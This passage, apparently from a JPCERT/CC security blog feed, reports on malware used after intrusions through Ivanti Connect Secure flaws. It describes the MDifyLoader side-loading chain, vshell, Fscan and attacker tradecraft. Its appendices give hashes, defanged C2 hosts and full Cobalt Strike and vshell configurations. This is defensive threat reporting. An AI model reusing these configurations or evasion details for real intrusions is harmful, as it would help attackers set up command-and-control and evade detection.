style="word-wrap: break-word; white-space: normal;">toupper(to_hex("vbewtdsmmswfweoz"))</td> <td style="word-wrap: break-word; white-space: 
normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lgehaoevolq")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ffjazoinsmsiywwt"))</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("bcstctskmngpjjax"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lklzndaawijhd")) + zero padding</td> <td style="word-wrap: break-word; white-space: 
normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ifovxtgokm|yzjwz"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> </tbody> </table> <h4>Appendix C:Cobalt Strikeのコンフィグの例</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 30000 MaxGetSize - 2097328 Jitter - 40 MaxDNS - Not Found PublicKey_MD5 - d67a7903c6777d64b69845b6fcd5db65 C2Server - 64.95.10[.]209,/Collector/2.0/settings/,179.60.149[.]209,/Collector/2.0/settings/,64.52.80[.]62,/Collector/2.0/settings/ UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.4.00.2879 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36 HttpPostUri - /MkuiIJzM2IZs Malleable_C2_Instructions - Remove 46 bytes from the end Remove 130 bytes from the beginning NetBIOS decode 'a' HttpGet_Metadata - ConstHeaders Accept: json Host: westeurope-teams.azureedge.net Referer: https://teams.microsoft.com/_ x-ms-session-id: f73c3186-057a-d996-3b63-b6e5de6ef20c x-ms-client-type: desktop x-mx-client-version: 27/1.0.0.2021020410 Accept-Encoding: gzip, deflate, br Origin: https://teams.microsoft.com ConstParams qsp=true client-id=NO_AUTH sdk-version=ACT-Web-JS-2.5.0& Metadata base64url parameter "events" HttpPost_Metadata - ConstHeaders Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 SessionId base64url parameter "id" Output base64url print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not 
Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\powercfg.exe Spawnto_x64 - %windir%\sysnative\powercfg.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg== Watermark - 987654321 bStageCleanup - True bCFGCaution - True KillDate - 0 bProcInject_StartRWX - True bProcInject_UseRWX - False bProcInject_MinAllocSize - 8096 ProcInject_PrependAppend_x86 - Empty ProcInject_PrependAppend_x64 - Empty ProcInject_Execute - ntdll.dll:RtlUserThreadStart NtQueueApcThread-s SetThreadContext CreateRemoteThread kernel32.dll:LoadLibraryA RtlCreateUserThread ProcInject_AllocationMethod - VirtualAllocEx bUsesCookies - False HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre> <h4>Appendix D:Network</h4> <ul> <li>64.52.80[.]62:443</li> <li>64.95.10[.]209:443</li> <li>67.217.228[.]55:443</li> <li>137.184.155[.]92:443</li> <li>159.65.241[.]37:443</li> <li>162.33.179[.]247:8443</li> <li>165.227.113[.]183:443</li> <li>179.60.149[.]209:443</li> <li>192.241.190[.]181:443</li> <li>api.glazeceramics[.]com:443</li> <li>doc.docu-duplicator[.]com:53</li> <li>doc2.docu-duplicator[.]com:53</li> <li>comdoc1.docu-duplicator[.]com:53</li> </ul> <h4>Appendix E:マルウェア</h4> <p>表2 マルウェア・ツール一覧</p> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> 
</colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">java(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">java.exe</td> <td style="word-wrap: break-word; white-space: normal;">16b1819186f0803b9408d9a448a176142f8271a4bc0b42cdb78eb4489bce16fe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: 
normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gds</td> <td style="word-wrap: break-word; white-space: 
normal;">28d668f3e1026a56d55bc5d6e36fad71622c1ab20ace52d3ab12738f9f8c6589</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gss</td> <td style="word-wrap: break-word; white-space: normal;">9e8c550545aea5212c687e15399344df8a2c89f8359b90d8054f233a757346e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">74a33138ce1e57564baa4ea4db4a882d6bf51081b79a167a6cb2bf9130ddad7f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">7ccff87db7b4e6bc8c5a7e570f83e26ccb6f3a8f72388210af466048d3793b00</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers</td> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers_windows.exe</td> <td style="word-wrap: break-word; white-space: normal;">e0e827198a70eef6c697559660106cfab7229483b0cd7f0c7abd384a3d2ee504</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">f79e047ae4834e6a9234ca1635f18b074a870b366fe4368c10c2ddc56dfbb1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">ac02aee660d44a8bfbc69e9c46cf402fd41e99915e13d0de3977e662ef13b2ca</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Plink v0.81</td> <td style="word-wrap: break-word; white-space: normal;">conhost.exe</td> <td style="word-wrap: 
break-word; white-space: normal;">2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">PsExec v2.43</td> <td style="word-wrap: break-word; white-space: normal;">PsExec.exe</td> <td style="word-wrap: break-word; white-space: normal;">078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">cab-related tool</td> <td style="word-wrap: break-word; white-space: normal;">hhupd.exe</td> <td style="word-wrap: break-word; white-space: normal;">d74eac55eeaa3138bc1e723c56013bb1af7709f0a77308bfbf268d4e32b37243</td> </tr> </tbody> </table>
  47. Malware confirmed in intrusions originating from Ivanti Connect Secure vulnerabilities

    Fri, 18 Jul 2025 02:00:00 -0000

    In previous JPCERT/CC Eyes posts, Ivanti Connect Secure...
    <p>In previous JPCERT/CC Eyes posts we covered the <a href="https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html" target="_blank">malware SPAWNCHIMERA</a> and <a href="https://blogs.jpcert.or.jp/ja/2025/04/dslogdrat.html" target="_blank">DslogdRAT</a>, which were installed by exploiting Ivanti Connect Secure vulnerabilities. JPCERT/CC continues to observe attack activity exploiting Ivanti Connect Secure vulnerabilities to this day. This post describes the following malware and tools used by attackers exploiting <strong>CVE-2025-0282</strong> and <strong>CVE-2025-22457</strong> from December 2024 through July 2025, as well as the techniques the attackers used after intruding into the organizations' internal networks.</p> <ul> <li>MDifyLoader and Cobalt Strike Beacon</li> <li>vshell</li> <li>Fscan</li> </ul>
    <h3>MDifyLoader and Cobalt Strike Beacon</h3> <p>Figure 1 shows the flow up to execution of Cobalt Strike. First, a legitimate file is launched from something such as a configured task, and a loader (hereafter MDifyLoader) is executed through DLL side-loading. MDifyLoader reads an encrypted data file, decodes the Cobalt Strike Beacon and executes it in memory.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs01-800wri.png" width="800" height="309" alt="" class="asset asset-image at-xid-3805232 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 1: Flow from MDifyLoader to execution of Cobalt Strike </div> <p><br></p> <p>MDifyLoader is a loader built on the open-source libPeConv<a href="#1">[1]</a>. RC4 is used to decrypt the data file, and the RC4 key is the MD5 hash value of the executable file. Because of this method, the loader does not work unless all three of the executable, the loader and the data file are present, which is likely intended to hinder analysis. We have confirmed cases in which the legitimate files used were the Java RMI compiler <strong>rmic.exe</strong> and <strong>push_detect.exe</strong>.</p> <p>Inside each function of MDifyLoader, countless pieces of junk code such as the one shown in Figure 2 were inserted. The junk code is a combination of nearly meaningless function calls and variable references; because relative address values are embedded in the code and the return values of the functions are referenced, the junk code is difficult to identify mechanically, a deliberate effort to hinder deobfuscation.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs02-800wri.png" width="800" height="372" alt="" class="asset asset-image at-xid-3805233 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 2: Obfuscation in MDifyLoader </div> <p><br></p> <p>Normally, Cobalt Strike Beacon holds its configuration data inside the sample, decoded at runtime with a 1-byte XOR key before it is referenced. In the Cobalt Strike Beacon used by the attackers, however, RC4 was used to decode the configuration data, and the RC4 key was hard-coded in the Beacon as <strong>"google"</strong>. Figure 3 shows the added RC4 code. From the number of configuration elements we also confirmed that it is Cobalt Strike <strong>Version 4.5</strong>. The Beacon's Name field reads <strong>NewBeacon.dll</strong>, which is presumably the name the attackers gave this Beacon.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs03-800wri.png" width="800" height="819" alt="" class="asset asset-image at-xid-3805234 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 3: RC4 function added to Cobalt Strike Beacon </div> <p><br></p>
    <h3>Use of vshell</h3> <p>vshell is a multi-platform RAT written in Go that was published on GitHub (at the time of writing, the GitHub repository in question is no longer public). We have confirmed cases in which the attackers used the Windows executable of vshell <strong>version 4.6.0</strong>. A notable feature of the vshell used is a function that checks at runtime whether the environment is Chinese-language; part of that code is shown in Figure 4. The attackers repeatedly failed to run vshell, and traces were found of them installing and attempting to run a new vshell each time. One possible cause is that a language-check feature used for internal testing was left in as-is.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs04-800wri.png" width="800" height="1389" alt="" class="asset asset-image at-xid-3805235 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 4: Part of the vshell code that checks for a Chinese-language environment </div> <p><br></p>
    <h3>Fscan</h3> <p>Fscan<a href="#2">[2]</a> is an open-source network scanning tool written in Go. The attackers execute Fscan through a loader. Figure 5 shows the flow up to execution of Fscan. A legitimate python.exe is abused to execute Fscan: a malicious python311.dll is loaded by DLL side-loading, reads <strong>k.bin</strong>, the encoded Fscan, decodes it and executes it in memory. python311.dll is built on the open-source FilelessRemotePE<a href="#3">[3]</a>, and decrypts the Fscan body using RC4 with the internally hard-coded key <strong>"99999999"</strong>.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs05-800wri.png" width="800" height="409" alt="" class="asset asset-image at-xid-3805236 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 5: Flow up to execution of Fscan </div> <p><br></p>
    <h3>Attack activity after intrusion into the internal network</h3> <p>The following sections describe the lateral movement, persistence and defense evasion techniques used by the attackers after intruding into the organizations' internal networks.</p> <h4>Lateral Movement</h4> <p>After intruding into the internal network, the attackers attempt to obtain credentials by means such as brute-force attacks against the AD server. They also scan the internal network and carry out brute-force attacks against FTP, MSSQL and SSH servers. Furthermore, they exploit the SMB vulnerability MS17-010 to intrude into unpatched hosts. Using the credentials obtained through these activities, they move laterally to other systems via RDP and SMB and install malware.</p> <h4>Persistence</h4> <p>The attackers created a new domain account and added it to each of the existing groups, securing an account that allows re-entry even if the credentials they had obtained are revoked. Such accounts are hard to distinguish from normal operations and make it possible to maintain access to the internal network over a long period. In addition, as a malware persistence method, the attackers registered the malware as a service or a scheduled task so that it executes at system startup or on specific event triggers.</p> <h4>Defense Evasion</h4> <p>The malware used in the Windows environment is executed through loaders that use legitimate files, which is presumably intended to evade detection and monitoring by security products. The Fscan loader, being built on FilelessRemotePE, inherits FilelessRemotePE's ETW bypass against Ntdll.dll, which is presumably aimed at evading detection by EDR and similar products.</p>
    <h2>Conclusion</h2> <p>These attacks have continued from December 2024 to the present, and attacks targeting VPN appliances such as Ivanti Connect Secure are expected to continue. The Appendix lists the malware hash values, communication destinations, Cobalt Strike configuration and vshell configuration; please refer to it.</p> <p style="text-align: right">Incident Response Group: 増渕 維摩, 喜野 孝太, 亀井 智矢</p> <h4>References</h4> <p><a name="1"></a>[1] libPeConv <a href="https://github.com/hasherezade/libpeconv" target="_blank"><br>https://github.com/hasherezade/libpeconv</a></p> <p><a name="2"></a>[2] Fscan <a href="https://github.com/shadow1ng/Fscan" target="_blank"><br>https://github.com/shadow1ng/Fscan</a></p> <p><a name="3"></a>[3] FilelessRemotePE <a href="https://github.com/ASkyeye/FilelessRemotePE" target="_blank"><br>https://github.com/ASkyeye/FilelessRemotePE</a></p> <h4>Appendix A: MITRE ATT&amp;CK</h4> <p>Table 1: ATT&amp;CK mapping of the attack activity</p> <table> <thead> <tr> <th>Tactic</th> <th>Technique ID</th> <th>Technique name</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Initial Access</td> <td>T1133</td> <td>External Remote Services</td> 
<td>Intrusion by exploiting a VPN appliance vulnerability</td> </tr> <tr> <td>Execution</td> <td>T1053.005</td> <td>Scheduled Task/Job: Scheduled Task</td> <td>Executes malware via a scheduled task</td> </tr> <tr> <td>Persistence</td> <td>T1136.002</td> <td>Create Account: Domain Account</td> <td>Creates a new domain account for persistence</td> </tr> <tr> <td></td> <td>T1098</td> <td>Account Manipulation</td> <td>Adds the created account to each group to secure persistent access</td> </tr> <tr> <td></td> <td>T1543.003</td> <td>Create or Modify System Process: Windows Service</td> <td>Registers malware as a Windows service and configures it to run automatically</td> </tr> <tr> <td></td> <td>T1053.005</td> <td>Scheduled Task</td> <td>Uses Task Scheduler to re-execute malware periodically or on trigger conditions</td> </tr> <tr> <td>Privilege Escalation</td> <td>T1543.003</td> <td>Create or Modify System Process: Windows Service</td> <td>Registers malware as a Windows service and configures it to run automatically</td> </tr> <tr> <td>Defense Evasion</td> <td>T1036</td> <td>Masquerading</td> <td>Disguises malware as legitimate files or names to hide abnormal behavior</td> </tr> <tr> <td></td> <td>T1070.004</td> <td>File Deletion</td> <td>Deletes the malware and tools used, to hide traces of the attack</td> </tr> <tr> <td></td> <td>T1140</td> <td>Deobfuscate/Decode Files or Information</td> <td>Use of obfuscation and decryption techniques by each loader</td> </tr> <tr> <td></td> <td>T1562.001</td> <td>Impair Defenses: Disable or Modify Tools</td> <td>Disabling of ETW by the Fscan loader's patching of ntdll.dll</td> </tr> <tr> <td>Credential Access</td> <td>T1110.001</td> <td>Password Guessing</td> <td>Performs brute-force attacks against the AD server, FTP, MSSQL and SSH to obtain credentials</td> </tr> <tr> <td>Discovery</td> <td>T1087</td> <td>Account Discovery</td> <td>Collects account information</td> </tr> <tr> <td>Lateral Movement</td> <td>T1210</td> <td>Exploitation for Lateral Movement</td> <td>Exploits the SMB vulnerability MS17-010 to move laterally to other hosts</td> </tr> <tr> <td></td> <td>T1021.001</td> <td>Remote Services: Remote Desktop Protocol</td> <td>Moves laterally to other hosts via RDP using obtained credentials</td> </tr> <tr> <td></td> <td>T1021.002</td> <td>Remote Services: SMB/Windows Admin Shares</td> <td>Expands the compromise through SMB shares</td> </tr> <tr> <td>Command and Control</td> <td>T1573</td> <td>Encrypted Channel</td> <td>Encrypts C2 communications using TLS or a custom encryption protocol</td> </tr> </tbody> 
</table> <h4>Appendix B: Malware</h4> <p>Table 2: Malware</p> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> </colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>SHA256 Hash</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Python(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">python.exe</td> <td>0cbf71efa09ec4ce62d95c1448553314728ed5850720c8ad40352bfbb39be99a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Fscan Loader</td> <td style="word-wrap: break-word; white-space: normal;">python311.dll</td> <td>699290a753f35ae3f05a7ea1984d95f6e6f21971a146714fca5708896e5e6218</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Fscan</td> <td style="word-wrap: break-word; white-space: normal;">k.bin</td> <td>cff2afc651a9cba84a11a4e275cc9ec49e29af5fd968352d40aeee07fb00445e</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Java RMI Compiler(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">rmic.exe</td> <td>a747be292339eae693b7c26cac0d33851cba31140fd0883371cc8de978583dbe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">push_detect(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">push_detect.exe</td> <td>f12250a43926dba46dcfb6145b7f1a524c0eead82bd1a8682307d1f2f1f1e66f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">MDifyLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td>45ecb7b23b328ab762d8519e69738a20eb0cd5618a10abb2c57a9c72582aa7e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">MDifyLoader</td> <td style="word-wrap: break-word; white-space: normal;">Microsoft.WindowsAppRuntime.Bootstrap.dll</td> <td>9e91862b585fc4d213e9aaadd571435c1a007d326bd9b07b72dbecb77d1a27ac</td> </tr> <tr> <td style="word-wrap: 
break-word; white-space: normal;">Cobalt Strike version 4.5</td> <td style="word-wrap: break-word; white-space: normal;">update.dat</td> <td>09087fc4f8c261a810479bb574b0ecbf8173d4a8365a73113025bd506b95e3d7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike version 4.5</td> <td style="word-wrap: break-word; white-space: normal;">config.ini</td> <td>1652ab693512cd4f26cc73e253b5b9b0e342ac70aa767524264fef08706d0e69</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws_windows_amd2.exe</td> <td>48f3915fb8d8ad39dc5267894a950efc863bcc660f1654187b3d77a302fd040f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws_windows_amd64.exe</td> <td>54350d677174269b4dc25b0ccfb0029d6aeac5abbbc8d39eb880c9fd95691125</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws.exe</td> <td>85f9819118af284e6b00ce49fb0c85ff0c0b9d7a0589e1bb56a275ed91314965</td> </tr> </tbody> </table> <h4>Appendix C: Communication destinations</h4> <ul> <li>172.237.6[.]207:80</li> <li>proxy.objectlook[.]com:80</li> <li>api.openedr.eu[.]org:443</li> <li>community.openedr.eu[.]org:443</li> <li>query.datasophos[.]com:443</li> </ul> <h4>Appendix D: Configuration information</h4> <ul> <li>vshell configuration</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> {"server":"proxy.objectlook[.]com:80","type":"ws","vkey":"safeshell","proxy":"http[:]//10.71.30[.]140:8080","salt":"safeshell","l":false,"e":false} </pre> <ul> <li>Cobalt Strike configuration</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 97352 MaxGetSize - 2105202 Jitter - 48 MaxDNS - Not Found PublicKey_MD5 - e880c4268fb48aebc5510e02f49d3bce C2Server - 
api.openedr.eu[.]org,/avatar/js/flashdetect.min.js,community.openedr.eu[.]org,/avatar/js/utm5.min.js UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 HttpPostUri - /Destroy/stylesheets/color_definitions_base Malleable_C2_Instructions - Remove 2025 bytes from the end Remove 6017 bytes from the beginning NetBIOS decode 'a' XOR mask w/ random key HttpGet_Metadata - ConstHeaders Accept: application/json, application/xml, text/html Accept-Language: zh-hk Accept-Encoding: br, compress Metadata mask base64url prepend "secure_id_4427KV8TXLHDJ9YJAM5XRIXHI12=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept: text/html, application/json, image/* Accept-Language: ar-ma Accept-Encoding: gzip, * SessionId mask base64url parameter "_SFUYPJNK" Output mask netbiosu print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\svchost.exe -k wksvc Spawnto_x64 - %windir%\sysnative\SearchProtocolHost.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - MYhXSMGVvcr7PtOTMdABvA== Watermark - 666666 bStageCleanup - True bCFGCaution - False KillDate - 0 bProcInject_StartRWX - False bProcInject_UseRWX - False bProcInject_MinAllocSize - 6771 ProcInject_PrependAppend_x86 - b'\x90\x90\x90f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x00PXf\x90PX\x0f\x1f\x00\x0f\x1fD\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00PXPX\x0f\x1f\x80\x00\x00\x00\x00f\x90\x0f\x1f\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00' 
